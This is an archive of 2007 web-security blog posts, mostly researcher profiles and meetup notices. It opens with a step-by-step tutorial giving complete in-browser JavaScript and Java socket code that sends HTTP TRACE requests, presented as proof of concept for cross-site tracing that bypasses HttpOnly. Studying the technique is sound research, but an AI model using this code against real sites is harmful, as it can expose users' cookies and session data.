Monday, April 30, 2007

Using Java from within browser's javascript to exploit web application vulnerabilities Part 1

Last weekend jeremiah showed me a code snippet where he was able to run TRACE method on a server using java from javascript. Though it was a little slow but it did the job. He asked me if there is a way to make it run faster. I did some work and using jdk1.4 API, I was able to get the job done a lot faster. I always knew that we can run java from javascript but it never crossed my mind that I can use it this way too. That is why, people like Jeremiah are so ahead in the game, because they have the ability to think differently.

In his post XST lives! (Bypassing HttpOnly) he has shown a proof of concept to exploit vulnerabilities in web applications.

The explanation here is (for the most part) the same as on his blog posting except for maybe a couple of extra points. But this exercise actually got me thinking and I want to make this a running thread and come up with more ideas of using java and javascript to figure out what else can be done.


Approach 1 (Traditional Approach using earlier versions of jdk)

Complete Code

var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);
var socket = new java.net.Socket(addr,port);
var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(),"UTF8"));
var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));
wr.write("TRACE / HTTP/1.1 \n");
wr.write("Host: " + host + "\n");
wr.write("\n\r");wr.flush();
var lines = "";
while ((str = rd.readLine()) != null)
{ lines += str + "\n"; }
alert(lines);
wr.close();
rd.close();
socket.close();

Step by Step explanation of the code

1. Get the url on the browser’s address bar

var l = document.location;

2. Get the host name.

var host =l.host.toString();

3. Set the port to 80. We can also determine the port from the location bar

var port = 80;

4. Get the IP address of the host given the host name. The host name can either be a machine name, such as "java.sun.com", or a textual representation of its IP address. If a literal IP address is supplied, only the validity of the address format is checked.

var addr = new java.net.InetAddress.getByName(host);

5. Java.net.Socket creates a stream socket and connects it to the specified port number at the specified IP address.

var socket = new java.net.Socket(addr,port);

6. Open an output stream to send the request data to the server.

var wr = new java.io.BufferedWriter(newjava.io.OutputStreamWriter(socket.getOutputStream(),"UTF8"));

7. Open an input stream to read the response data from the server.

var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));

8. Send a trace request to the server.

wr.write("TRACE / HTTP/1.1 \n");
wr.write("Host: " + host + "\n");
wr.write("\n\r");

9. Flush the output stream so that there is no data left in the buffer.

wr.flush();

10. Read the response from the server until the readLine returns null which means the response is completed.

var lines = "";
while ((str = rd.readLine()) != null){ lines += str + "\n"; }

11. Display the lines using javascript alert function

alert(lines);

12. Close the input and output stream

wr.close();
rd.close();

13. Close the socket

Socket.close();


Approach 2

In the traditional way (like the approach mentioned above), you'd ask for the socket's input and/or output streams. The newer approach is using Channels. This approach is available with jdk1.4 or newer. With a channel you write directly to the channel itself. Rather than writing byte arrays, you read and write ByteBuffer objects. By default, this will read at least one byte or return -1 to indicate the end of the data, exactly as an InputStream does but it will often read more bytes if more bytes are available to be read.

Complete Code
var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);

var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));
var line = "TRACE / HTTP/1.1 \nHost: " + host + "\n\r\n";
var s1 = new java.lang.String(line);

client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

var buffer = java.nio.ByteBuffer.allocate(8000);
client.read(buffer);
alert(new java.lang.String(buffer.array()));



Step by step explanation


//Same as in above approach
var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);

1. Create a SocketChannel

var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));

2. Create a java string object so that it can be converted to byte array.

var line = "TRACE / HTTP/1.1 \nHost: " + host + "\n\r\n";
var s1 = new java.lang.String(line);

3. Wrap the data into a ByteBuffer object. Send the buffer to the server.

client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

4. Allocate a ByteBuffer object to read the data from the server. The advantage of using ByteBuffer is that it will read more bytes at the same time instead of reading one byte at a time.

var buffer = java.nio.ByteBuffer.allocate(8000);

5. Read the data from the server. If the data is more then the allocated bytes then use a while loop

client.read(buffer);

6. Display the response using javascript alert function

alert(new java.lang.String(buffer.array()));

If there is more data then allocated (like 8000 bytes here). Use the following code snippet

while (client.read(buffer) != -1) {

buffer.flip( );

out.write(buffer);

buffer.clear( );

}


The difference between the first and the second approach is the first approach is slower then the second approach. The first approach, however, will be more compatible across OSes since it uses earlier versions of jdk whereas the newer approach might not.

I will publish other things soon which I found out while doing this exercise.

Reflection on Andrew Van Der Stock


This week on reflection we have Andrew Van der Stock. Andrew is very active in webappsec industry through OWASP and is involved in a lot of activities including OWASP top ten or OWASP Guide, etc. He has contributed a lot to webappsec field, more so in terms of research and awareness on securing the applications rather then exploiting them. He used to be based out of Australia and has recently moved to Columbia, MD and joined Aspect Security. Today he shares with us his journey with web application security and his thoughts on black hat and white hat hackers (or should I say security professionals). In his own words


”I started playing with computers when I was 7 on a Commodore Pet. My first attempts of squeezing more out of my computer than it probably was capable of was with my Amstrad 6128, which ran a Z80 at 4 MHz. I more than doubled the speed of the 3" (yes, 3") disk drive by driving it directly. This is where I had my first taste of assembly language and low level prodding and probing.

Back in the mid-1990, I was a system administrator at an Australian hospital. Doctors would frequently try to dump private electronic patient (UR) records for their private use, possibly to sell to drug companies, but always illegal. This unregulated (at the time) but
immoral use of our health data infuriated me and got me into ethics and privacy in a big way. This led me to join SAGE-AU, the System Administrator's Guild of Australia, eventually rising to be SAGE-AU's President.

I used to be the editor of SAGE Advice, the SAGE-AU journal, and I ended up writing about 20-30 articles for that. Most are system administration flavored, so not that useful to your readers.

I used to pen a weekly column for the Australian newspaper (a daily national broadsheet in Australia). I think I wrote about 30 odd articles for them back in the day, but their archives are closed to non-subscribers so I can't tell for sure. I lost a lot of data (we all
learn once!) when I went from my early Macs to my SMP workstation running Windows NT 3.51, and I still don't have all my data from that time. Luckily, I'm back on a beautiful Mac again, and as I've learnt the hard lessons of data, I have everything dating back to 1995.

I was the author of most of the technical standards and policy set by auDA, the Australian Domain Name Administrator (similar in function to ICANN). I worked with two or three others for the majority of this project, although as always, we started with many more. My work on this panel regulates how DNS works in Australia.

I never completed my degree. If anyone from RMIT CS is reading, I wouldn't mind getting some credits for my work at OWASP so I can finish it up. Let's talk! If anyone else is interested in offering me a place in masters by research program in web app sec, I'd be interested. I don't think I'm really cut out for undergraduate course work, but I love doing ground breaking research.

I am a dual Microsoft MCSE. My first MCSE was NT 4.0 back in 1997, and then I got my Windows 2000 early adopter MCSE in late 1999 when they were trialing the exams. Early adopters got a nice Gold MCSE card! Many folks find this a bit funny, especially as I've been active in open source for so long... And that I'm really a Mac dude at heart.
But I have a soft spot for Microsoft as they do the basic research in our field, and they own up to security flaws and fix them properly. Now, they're reaping the rewards. Good for them. Many vendors could learn a thing or ten from MS. I'm pretty sure my MCSE's are expired now.

In 1998, I entered the field properly as a security consultant. At that stage, finance institutions were starting to review the lockdown of apps. I was drafted into looking at various apps for many larger finance institutions, who were concerned with unmanaged risk and "mobile code" - ActiveX and Java applets running on their PCs. My interest grew from there, even though I didn't really start code reviewing stuff every day until the early part of this century.

In web app sec, I am completely self taught, but I did learn a lot from folks at OWASP – no one lives in a vacuum. I still do a lot of research using forum software to see how things can be fixed in the real world. I love working with some very smart folks who challenge me every day. It's a sad day when you don't learn or discover something new.

To understand this field, you must understand the threats and attacks to defend against them. I am reasonably certain anyone can learn how to attack if they Think Evil for long enough. It's far easier to Think Evil and destroy than it is to create solid software.

The proof of this putrid state of affairs is s'kid marks getting lots of unthinking column centimeters every day, and yet how little praise the folks in Microsoft got for their work on .NET 2.0. .NET 2.0 advances the field in so many ways – say by automatically rejecting any option in a select list which wasn't sent out in the first place. Whoever thought of that should be on the front page of CNET for a year to make up for the waste of space most "hacking" stories get. And there are so many more unsung heroes - master craftsmen (and women!) all. For every La Padula or Bell or Schneier, there's a thousand or more s'kid marks. This is a very asymmetrical situation and it's not good for our industry.

Criminals who attack systems are simply criminals, or in the abstract, attackers. Low level attackers are "s'kid marks" to me – morons who have a script who think they are the most l33t players. Unfortunately, a million s'kid marks equates to a lot of damage as eventually one or two will strike it lucky during school break.

The true hackers are folks like polymaths like Turing, von Neumann, Douglas Engelbart (the primary creator of the desktop metaphor back in the 1960s), Steve Wozniak (a true hardware hacker), the folks who made my HP 48G calculator (a work of art and mathematical tour de force!), and the recently deceased John Backus (the guy who created Fortran and is the "Backus" in BNF, used in every RFC grammar from here to
eternity). Those folks are worthy of respect and are the true meaning of the word "hacker". But now, the word is lost forever because of constant misuse over a long period of time.

My thing is software engineering as a repeatable practice. We have to stop treating web app sec as a black art. We have to stop lauding the attackers and praising the folks who deliberately break software for nothing more than getting their name in lights. We have to stop thinking these folks are somewhat special. If you're a s'kid mark today, it's time to step up and move on. If you're any good, come join us on the light side of the force – before you commit a crime. There's so much to do and so much research begging for someone to just come and do it.

We should be celebrating the folks who put the hard yards into security research which protects us all – permanently. I'm trying to do this with CSRF at the moment, and will be taking some time this year to make PHP 6.0 safer. I know how to attack software and have done so, but I prefer to build strong software, so my skills lie in ensuring that the defenses and controls I write about, recommend, or indeed implement are robust against known attacks as well as the stuff over the horizon. Occasionally, I am at the horizon, such as when I went and played with JSON injection before pretty much anyone else. I don't claim to have invented JSON injection as it's so totally obvious anyone with half a clue could have recreated my work without any knowledge of what I was doing.

We need more folks who hang out at OWASP and WASC. We should have totally eliminated all forms of injection and other common weaknesses by now - and moved on to where the value lies – the business rules. It's a shame so many are sucked in by the dark side of our industry. It's such a waste of good talent.

I'm one of the dudes working on questions for SANS "National Secure Programming Skills Assessment", a soon to be forthcoming certification which will sort the wheat from the chaff. I'm doing the Java questions (eventually) and hope to be involved in the PHP questions when they kick that off. With some luck, this will not become a paper certification (where certified but clueless folks are rampant), but a suitable metric to prove skill.

I had a book contract to write an Ajax Security Book based upon my world famous Ajax Security Presentation from February last year. However, life intervened, and that's on permanent hold, especially as Billy Hoffman & co is writing what will be a superb Ajax Security book if his research is anything to go by.

I have the bones of a security architecture book waiting to go. If anyone feels like writing it with me, I should be free enough sometime in about two-five years :) Really should finish Guide 3.0 before starting this one though.

I've been involved in open source a long time. My first open source project, which I never completed (shame!) was GNU stty (gstty). Since then, I've been involved in XFree86 (from about 1996 onwards), Linux kernel when things didn't work on my SMP workstation (SMP was rare in the day), on the extreme periphery of NetBSD (my friend Luke was NetBSD core, so I wanted to show a little loyalty to his projects ;), pnm2ppa – print drivers for HP's worst ever printers for Unix/Linux/BSD.

Since 2001, I've been running Aussieveedubbers, a largish VW nut forum. Through that, I got into writing forums. Initially, I helped write XMB, which after a spat became UltimaBB, then GaiaBB, and possibly that code base will be re-forked back into XMB. UltimaBB is very secure compared to its contemporaries as I've been busy with it. However, like all projects using my infinite spare time... Things take a back seat to my real job and my real life.”

Below are his contributions to the webappsec community.

Articles:-

OWASP Guide 2.0 – as lead author and editor.
http://www.owasp.org/index.php/Guide_Table_of_Contents

OWASP Top 10 2007 (along with Dave Wichers and Jeff Williams).
http://www.owasp.org/index.php/Top_10_2007

Many web app sec blog articles:

http://www.greebo.net/?cat=3 (web app sec, 47 blog entries)
http://www.greebo.net/?cat=16 (OWASP, 24 blog entries)
http://www.greebo.net/?cat=17 (conferences and travel)


Memberships:-

Executive Director - OWASP
Columbia PHP user group
SAGE-AU 1995 - 2002, ex-President Jun 2000 – Mar 2001
AISA


Conferences:-

Andrew has presented at the following conferences:

SAGE-AU - The System Administrators Guild of Australia
OWASP – Open Web Application Security ProjectLinux Australia
AusCERT – Australian Computer Emergency Response Team
RuxCon - Australian security conference, Vulnerability assessment and hacking information, for Australia
Black Hat – Black Hat
OSCON – Oreilly Open Source Convention


His favorite presentation is Ajax Security presentation. http://www.greebo.net/owasp/ajax_security.pdf

Predictable ISN numbers in Foundry ServerIron. My first bugtraq advisory back in 2000. So proud!
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0178


Tutored "Internet 101" back in the early 1990's at the Business Faculty at RMIT University


Tools written by him:-

WebSphere {xor} Secret Magic Ring Decoder Toy (C#)

XMB / UltimaBB / GaiaBB – forum software. It's a good test harness for new webappsec ideas. XMB 1.9.7 is due soon which fixes a lot of security issues. (PHP)


Companies worked for:-

Web Application Security jobs:

e-Secure – Senior Security Architect
b-sec – Chief Technologist
National Australia Bank – Security Application Architect
Aspect Security – Senior Engineer


Company working for:-

Aspect Security


Email:-

vanderaj__at__owasp__dot__org



Website:-

http://www.owasp.org


He has one of the sharpest brains in the industry. These contributions above do not reflect the amount of work he has done in promoting awareness in web application security.

Last Week – Nish Bhalla
Next Week – Bill Pennington

Monday, April 23, 2007

WASC Meetup - April 18 - pictures

Sorry for the delay in this post. Last wednesday we had our WASC meetup in sunnyvale. Unfortunately the date coincided with OWASP san francisco chapter meeting and some infosec conference in toronto so we did not get as much attendance we expected but still some of us showed up. Jeremiah had already mentioned on his blog that everyone has to buy a beer for someone they havent met before. :)


Before you look at the pictures, i want to apologize for the quality since they were taken from my cellphone.



From left to right -
Comcor - looking at people he hasnt met before, thinking how much beer he will have to buy.
Jeremiah (whitehat) - thinking why am i so popular. everyone knows me so nobody will buy me a beer. Grrr
Brian Chess (Fortify Software) - laughing since there are a lot of people who will have to buy him a beer. He has no clue that he have to buy for them as well.


From left to right
Joe (Tivo) - All smiles since he got his beer.
Robert Auger (WASC) - asking the guy to buy drinks since he has never met him before.
??? - He didn't tell me his name. maybe he didnt want to buy me a drink.


Left - comcor wondering do i really need to buy others a drink.
Right - Jeremiah (whitehat) smiling and enjoying his beer. Maybe he has a plan for someone to pay for it.




From left to right -

Cori (Google) - Looking at brian chess (right) to buy him a beer
Jeremiah (Whitehat) - Ordering appetizers for us (it was very nice of him)
Brian Chess (Fortify Software) - probably scared..he doesn't want to buy Cori a beer

Left - Frederick Lee (Fortify Software) wondering what did i do to deserve this.
Right - Joe (Tivo) - probably thinking how to get jeremiah to pay for everybody's beer. You can see a smile on his face




From left to right -
Andy (Paypal), Robert Auger (WASC), Joe (Tivo)
Everybody happy since Jeremiah picked the tab.


All the jokes apart, it was fun getting to know people who are in bay area and hopefully we will do it again sometime in the next couple of months. This time we will make sure that it doesnt coincides with other events.

Special thanks to Jeremiah for bringing all of us together.

Reflection on Nish Bhalla


This week on reflection we have Nish Bhalla from SecurityCompass. Nish has been around the block for a long time and used to work for FoundStone before starting his own company. He is a specialist in product testing, code reviews, web application testing, host and network reviews. He has presented in various conferences, published articles, contributed and co-authored several books. He takes lectures and Webinars at Seneca College , Florida University and has also been quoted in Government Security News, InternetNews and CSO Online.
He has tremendous knowledge in webappsec space and has been involved with OWASP and YASSP. Below is his journey in WebAppSec space in his own words

“I've been interested in security since the mid 90s' pretty much right after I was exposed to UNIX. I started off by developing client / server apps around the same time and tried to hack them. Security knowledge was still considered underground hacker knowledge then and not a whole lot of information was publicly disseminated. I had the opportunity to meet with a few interesting virus writers back at school who taught me a few things about reverse engineering and Clipper the old reversing software (not the clipper programming language).

I started learning about web technologies in the late 90s when I was involved in performing host audits and building secure web servers. I had the opportunity to be involved with the rollout of an online trading company's web application. This was the time where I started getting a good understanding of web applications and how they interact with various components. I took care to understand the technologies and their underlying protocols during this time.

During the same time (in late 90's) I had the opportunity to work for Foundstone. An amazing team of security consultants taught me some new tricks on hacking web applications. I had already learnt a lot about web security when I was involved with the rollout but what these consultants taught me was to adopt a different mind set - the attacker's mind set.

The ease of exploiting of Web Applications was what got me so involved in web app sec (unlike writing buffer overflows which requires a lot more low level knowledge and skills). The code behind the various web application vulnerabilities caught my interest more than just the vulnerabilities themselves.

In 2004 after leaving Foundstone I started Security Compass, which is where I am today. We decided to develop RATS like web code auditing tool; SWAAT (Security Compass Web Application Analysis Tool) to help with doing some basic server page code auditing.

We're currently involved in doing some interesting research on web services and we'll be coming out with interesting web services tools in the near future.

I'm a big snooker/pool fan; living in Toronto provides me with the chance to meet a lot of interesting people.”


Based out of Toronto, CA, Nish is 33 years old. Below are his contributions to the community.


Articles:-

Writing Stack Based Overflows on Windows
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part1.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part2.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part3.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part4.pdf

AIX 4.3 Bastion Host Guidelines
http://www.giac.org/certified_professionals/practicals/gsec/0853.php

Building Secure Applications: Consistent Logging
http://www.securityfocus.com/infocus/1888

IIS Lockdown and Urlscan
http://www.securityfocus.com/infocus/1755


Books:-

Co-authored

Buffer Overflow Attacks
http://www.amazon.com/gp/product/1932266674/


Contributed

Hacking Exposed Web Applications, Second Edition
http://www.amazon.com/gp/product/0072262990

HackNotes(tm) Network Security Portable Reference
http://www.amazon.com/gp/product/0072227834/

Windows(R) XP Professional Security
http://www.amazon.com/gp/product/0072226021/

Writing Security Tools and Exploits
http://www.amazon.com/gp/product/1597499978


Conferences:-

Web Service Vulnerabilities
http://www.blackhat.com/html/bh-europe-07/bh-eu-07-index.html

Application Security - Dallascon
http://www.dallascon.com/

Federations of Security Professionals
http://www.fspgroup.ca/

Binary Analysis, Finding Secret in ISAPIs - 2006
http://www.syscan.org/

Preparing for a FISMA Compliancy Audit: What IT Security Professional Needs to Know
http://www.infosecurityevent.com/App/homepage.cfm?moduleid=42&appname=100004

Finding Secrets in ISAPI
http://conference.hackinthebox.org/hitbsecconf2006kl/

Auditing Source Code
http://2005.recon.cx/


Other Contributions:-

OWASP Toronto Local Chapter
http://www.owasp.org/index.php/Toronto

SWAAT
http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

Yet Another Solaris Security Project
http://www.yassp.org/yassp/


Company working for:-

Security Compass


Email:-

nish__at__securitycompass_dot_com


Website:-

www.securitycompass.com


Companies worked for:-


Foundstone, Infotek Solutions


Education:-

Masters in Parallel Processing from Sheffield University,
Post graduation in Finance from Strathclyde University,
Bachelor in Commerce from Bangalore University



Nish is currently working on some very interesting tools and hopefully will be released soon which are definitely worth evaluating.

Last Week – Ory Segal
Next Week – Andrew Van Der Stock

Monday, April 16, 2007

Reflection on Ory Segal


This week on reflection we have Ory Segal of Watchfire. Ory has been involved in the webappsec from its very early days. He has published several whitepapers, articles and advisories. He has contributed to security standards like WASC Threat Classification and WASC Firewall Evaluation Criteria. He has spoken at various conferences and security events and is very reputed amongst the web application security professionals. Today, he shares with us his journey in web application security field. In his own words

“My involvement in the security world started back in 1995, when I was hired as a technician for a company that dealt with counter-intelligence. The job was very interesting and included all sorts of things you only see in movies – scanning and locating eavesdropping equipment, installing all sorts of intelligence gadgets for government agencies, etc. (during that time I developed paranoia, and to this day I always search new places I visit for hidden security cams).

When I grew tired of counter-intelligence I made the switch over to the Internet which was just emerging here in Israel. I worked for about a year for one of Israel’s biggest ISPs, and I learned all about network security - specifically TCP/IP and Linux. Someone I knew (and who knew what I was doing in my spare time) who worked for a large data security consulting company in Israel asked me to help her build a penetration testing team, which sounded very interesting to me. I then spent almost two years building a team of penetration testers that performed risk assessments for almost every major company in Israel, as well as most of the government offices. As a part of my job, I was managing several large-scale and critical information security projects for clients such as the Tel Aviv Stock Exchange, Israeli banks and the Israeli Department of Defense.

On one of the projects I was managing, I was introduced to a very interesting piece of software, which at the time was quite innovative – a Web Application Firewall. It was called Clearnet, and was developed by a small company called Perfecto Technologies. The product would later become AppShield, and the company would later become Sanctum Inc. AppShield was such an interesting and refreshing idea that it got me very intrigued. As part of my role I got the chance to try and hack my way through AppShield which was very hard. I did find some minor issues, but never got through… that’s when I really got hooked on web application security. Unlike network-level hacking, which almost always summed up to exploiting some buffer overflow, web application hacking posed a lot more challenges. It was all about bypassing application logic and felt like solving a puzzle.

After a few months I received an offer from Gili Raanan (co-founder of Sanctum) who was in the process of putting together a team of security researchers. During my interview I was introduced to the soon-to-be-famous Amit Klein. Lucky for me, Amit decided to hire me. In the end, working with Amit is one of my fondest memories of my years with Sanctum. Amit is a great mentor and I could not have hoped for a better boss, and friend.

My work at Sanctum revolved mostly around AppScan - a new product the company was just building. It was the first automated web application scanner in the world. When I started working on the product, it was just at v1.0, and was built around an HTTP Proxy. It worked by proxying and analyzing HTTP traffic that was created by the user who manually browsed through the application, and by creating some simple parameter tampering attacks. At that time it did not include the sophisticated capabilities that we have all come to expect from AppScan.

As well as performing lots of web application security audits and researching and publishing vulnerabilities, I was also responsible for writing parts of AppScan’s attack engine, creating and maintaining thousands of attacks for the product’s test database. At the time, one of the biggest challenges for web application scanners was how to automate the process of testing and validating web security issues - our group pioneered this field.

When I first started working for Sanctum in 2000, web application security was in its infancy – we had to educate the market. It was challenging but very fulfilling. Sanctum created this market space and I was thrilled to be a part of something I knew would only grow in importance. I remember how people who attended presentations I gave looked at me, and how their jaws dropped when I would demonstrate simple things like Shopping-Cart manipulations or SQL Injection. Big pieces of the WebAppSec puzzle were still missing – XSS, Blind SQL Injection, and many other techniques were either not yet know publicly, or known but not taken very seriously. In fact, as you probably know, XSS was disregarded by many during the first years after it was discovered – people didn’t take it seriously for a long time.

In 2004 Watchfire acquired Sanctum and I took the role of AppShield Product Manager and helped the company successfully transition AppShield to F5.

In 2005 I accepted the role of Director of Security Research for Watchfire and since then I have been a part of the Product Management Group. In this role I am responsible for helping to improve AppScan and to continually find ways to automate more aspects of the web application security assessment process. In addition, I am also researching new technologies and directions for Watchfire’s products as well as overseeing the security research which is now performed by a much larger team of security experts (who recently published the “Overtaking Google Desktop” whitepaper).

I am very excited about the direction that AppScan and automated scanning has taken in recent years, and I am sure we’ll see some major improvements and interesting new technologies in the near future. I am also very happy to see that more and more organizations are taking WebAppSec seriously, the market has come a long way.

In the “old days”, we did publish some *nasty* anonymous security advisories. It was fun, but I can’t disclose any more information. Now I am a strong supporter of proper disclosure policies (go RFPolicy!)

Back in 2002, I co-founded a small local group of security experts called 8200.org (it was a takeoff on the whole 2600.org, and 8200 – an Israeli intelligence army unit, which spawned some of the greatest minds in the security industry). We ran several projects, one of which was the first WarDriving experiment in Israel. The results were obvious and we got some publicity in local newspapers. Among others, the group included Liraz Siri (who performed the Internet Auditing Project and scanned 36 million servers across the internet)

I am a musician, I mainly play guitar. I have been a part of the Tel Aviv Indie Rock scene since 1997. In 1997 I put out a solo record (where I played all instruments), under the pseudonym “Wilkesboro Brothers”, since then I have been involved in several bands. My current band is called Pits (http://www.myspace.com/pitzmusic), we put out an album in 2005, which got good reviews and we are currently working on our second album. If you happen to be in Tel-Aviv, check out our gig schedule.

I live with my wife Orli, who is also involved in the IT Security market (Orli worked many years for Check Point, and also co-founded another security start-up). It’s not uncommon to hear us talk about security stuff at home. We are both techies and also fanatic music lovers.”




Based out of Tel Aviv, Israel, Ory is only 33 years old. Below is a list of his contributions to the community.


Articles:-

Testing Privilege Escalation in Web Applications:
https://www.watchfire.com/securearea/whitepapers.aspx?id=24

Web Application Forensics: The uncharted territory:
http://www.cgisecurity.com/lib/WhitePaper_Forensics.pdf

Methodologies & Tools for Web Application Security Assessment:
https://www.watchfire.com/securearea/whitepapers.aspx?id=20

Ory has also authored a series of web casts on the subject of the WASC TC project, covering web application security, advanced hacking courses, and gave numerous presentations around the globe on the subject of Web Application Security. Those links can be found on Watchfire website (Requires personal information).



Advisories:-

Apache Win32 Batch File Remote Command Execution Vulnerability:
http://www.securityfocus.com/bid/4335

Multiple vendors web server source code disclosure - 8.3 name format vulnerability:
http://www.securityfocus.com/archive/1/273308

Macromedia ColdFusion MX Missing Template Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/5011/

Microsoft Exchange Server 5.5 Outlook Web Access Cross-Site Scripting Vulnerability:
http://www.securityfocus.com/bid/8832

Multiple XSS vulnerabilities in Microsoft SharePoint Portal Server:
http://www.securityfocus.com/bid/10043

Cpanel Admin Interface HTML Injection Vulnerability:
http://www.securityfocus.com/bid/8119

Microsoft IIS 5.x/6.0 WebDAV (XML parser) attribute blowup DoS (Written by Amit Klein). Helped to apply the vulnerability to Microsoft IIS servers:
http://www.securityfocus.com/archive/1/378179

PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities:
http://www.securityfocus.com/bid/10753 &
http://www.securityfocus.com/bid/1074

Deerfield VisNetic WebSite Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/6369


Tools:-

Ory has been actively developing parts of Watchfire AppScan and the PowerTools for a long time now, but other than that most of the tools are only used internally in Watchfire.


Contributions:-

MITRE CWE project
http://cwe.mitre.org/

WAFEC
http://www.webappsec.org/projects/wafec/

WASC Threat Classification
http://www.webappsec.org/projects/threat/



Memberships:-

Web Application Security Consortium


Blog:-

http://blog.watchfire.com


Education:-

BA in Computer Science from the Open Univ. of Israel.


Companies worked for:-

YTS Security Systems, Internet Gold, Avnet Data Security, Sanctum, Watchfire


Company working for:-

Watchfire


Email:-

osegal at watchfire dot com


Ory Segal is amongst one of the respected figures in web application security. I hope he starts his blog soon to share his ideas and thoughts more frequently with us.
Last Week - Chris Shiflett
Next Week – Nish Bhalla

Tuesday, April 10, 2007

WASC Meetup in bay area

Its a beerfest guys. put it on your calendar

Normally we hold WASC Meet-Ups during large conferences (RSA/ BlackHat) where a lot of web application security people are at same place at the same time. Around the S.F. Bay Area there's enough webappsec people that we we no longer need that excuse. So we're going to plan a WASC Meet-Up inviting those in the local community to drop by. It'll be an informal event, maybe 15-30 people, no presentations or sponsors. Just like minded people sharing food, drinks, and interesting conversation. Simply an opportunity to see people that we only otherwise communicate with virtually. Everyone is welcome. Please RSVP to Jeremiah if you plan on coming.

RSVP - contact__at__webappsec_dot_org

Time: Wed, April. 18 @ 6:00pm
Place:The Faultline (Sunnyvale)
http://www.faultlinebrewing.com/
1235 Oakmead Parkway
Sunnyvale, California, 94086
Tel:408/736-2739

See you all there!

Friday, April 06, 2007

Reflection on Chris Shiflett



This week on reflection we have Chris Shiflett. One of the very few people who have been blogging on webappsec for a long time and I am sure is amongst the top 10 visited blog on web application security. His knowledge on web application security is tremendous and his blog is a goldmine for people who are looking to learn and understand various types of web application vulnerabilities and their solutions. He has spoken at numerous conferences, published several articles and even written few books.

Chris shares with us how he got started with web application security field and how he got involved with PHP security consortium. In his own words

“I've been an avid web enthusiast since the early 90s, although the first couple of years were mostly spent exploring the technologies involved, particularly HTTP. Web application security is a natural extension of my ongoing desire to apply creativity to a solid fundamental understanding of technology. I started programming on a Commodore 64 in the early 80s, but it wasn't until the early 90s that I focused my attention on web technologies.

The PHP Security Consortium is a group of people whose focus is educating the PHP community about web application security. It began with a simple post on my blog in 2004 requesting assistance with some research I was conducting at the time. (I was researching worms that combine XSS and CSRF, an idea later brought to life by the Myspace worm.) To date, members of the PHP Security Consortium have written books and articles, spoken at industry-leading PHP and open source conferences, and collaborated on projects like the PHP Security Guide and PHPSecInfo. Very little of our work promotes the group itself, because our focus is helping people.

I'm an avid soccer fan. Living in New York provides me with the chance to play with skilled players from all over the world, so I spend almost every weekend in the park. My wife runs marathons and occasionally convinces me to run with her, but I prefer soccer. :-) “



Based out of Brooklyn, NY, USA, Chris is only 30 years old (I cannot believe so many leading people in webappsec field are below 30, which is a very promising sign for the industry). Below are his contributions to the webappsec community.


Books:-

Essential PHP Security (O'Reilly, 2005)
http://phpsecurity.org/

HTTP Developer's Handbook (Sams, 2003)
http://shiflett.org/books

Contributions to other books

Programming PHP (O'Reilly 2006)
http://www.amazon.com/Programming-PHP-Rasmus-Lerdorf/dp/1565926102

PHP Cookbook (O'Reilly 2006)
http://www.oreilly.com/catalog/phpckbk2/

PHP in Action (Manning, 2007)
http://www.manning.com/reiersol/


Articles (WebAppSec only):-

Note: This is a subset of articles that are at least tangentially
related to web application security.

The articles without the link were published in PHP architect magazine and are available only upon subscription. The dates are mentioned along with the article (in case you want to look up that particular issue of the magazine). You can also find the information on his blog though.

Security Corner: Security Testing - 19 Dec 2006

Security Corner: Cross-Domain Ajax - 16 Oct 2006

Security Corner: Understanding Superglobals - 25 Jul 2006

Security Corner: Character Encoding - 28 Feb 2006

Security Corner: Email Injection - 25 Jan 2006

Security Corner: Context - 22 Dec 2005

Security Corner: Cross-Site Scripting - 21 Nov 2005

Security Corner: HTTP Response Splitting - 25 Oct 2005

Security Corner: Code Audits - 21 Sep 2005

Security Corner: Theory - 18 Jul 2005

Security Corner: Persistent Logins - 25 May 2005

Security Corner: BBCode - 19 Apr 2005

Security Corner: Magic Quotes - 21 Mar 2005

Security Corner: PHP Security Consortium - 15 Feb 2005

Guru Speak: Storing Sessions in a Database
http://shiflett.org/articles/storing-sessions-in-a-database

Security Corner: Cross-Site Request Forgeries
http://shiflett.org/articles/cross-site-request-forgeries

Security Corner: Ideology
http://shiflett.org/articles/ideology

Guru Speak: How to Avoid "Page Has Expired" Warnings
http://shiflett.org/articles/how-to-avoid-page-has-expired-warnings

Security Corner: File Uploads
http://shiflett.org/articles/file-uploads

Security Corner: Secure Design
http://shiflett.org/articles/secure-design

Security Corner: Session Hijacking
http://shiflett.org/articles/session-hijacking

Security Corner: Form Spoofing
http://shiflett.org/articles/form-spoofing

Security Corner: Input Filtering
http://shiflett.org/articles/input-filtering

Security Corner: SQL Injection
http://shiflett.org/articles/sql-injection

Security Corner: Shared Hosting
http://shiflett.org/articles/shared-hosting

Security Corner: Session Fixation
http://shiflett.org/articles/session-fixation

The Truth about Sessions
http://shiflett.org/articles/the-truth-about-sessions

Foiling Cross-Site Attacks
http://shiflett.org/articles/foiling-cross-site-attacks

Passport Hacking Revisited
http://shiflett.org/articles/passport-hacking-revisited

Passport Hacking
http://shiflett.org/articles/passport-hacking


Lectures / Talks:-

Almost all of the below mentioned talks you can find reference on chris’s blog. I tried to get the links but everytime i got sidetracked with something on his blog and eventually ran out of time. For the links, please check back again later or you can search on this blog (http://shiflett.org)

PHP Under Attack - OSCON (10 Jul 2003)

PHP Attacks and Defense – ApacheCon (19 Nov 2003)

